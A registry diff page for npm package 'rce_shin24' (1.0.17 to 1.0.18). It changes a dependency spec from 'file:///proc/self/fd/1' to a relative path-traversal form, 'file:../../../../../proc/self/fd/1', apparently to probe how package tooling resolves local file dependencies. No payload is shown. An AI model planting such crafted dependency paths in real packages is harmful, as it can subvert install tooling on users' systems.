rce_shin24 1.0.17 → 1.0.18

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "rce_shin24",
3
- "version": "1.0.17",
3
+ "version": "1.0.18",
4
4
  "description": "123",
5
5
  "main": "index.js",
6
6
  "scripts": {
@@ -8,7 +8,7 @@
8
8
  },
9
9
  "author": "",
10
10
  "dependencies": {
11
- "aaa": "file:///proc/self/fd/1"
11
+ "aaa": "file:../../../../../proc/self/fd/1"
12
12
  },
13
13
  "license": "ISC"
14
14
  }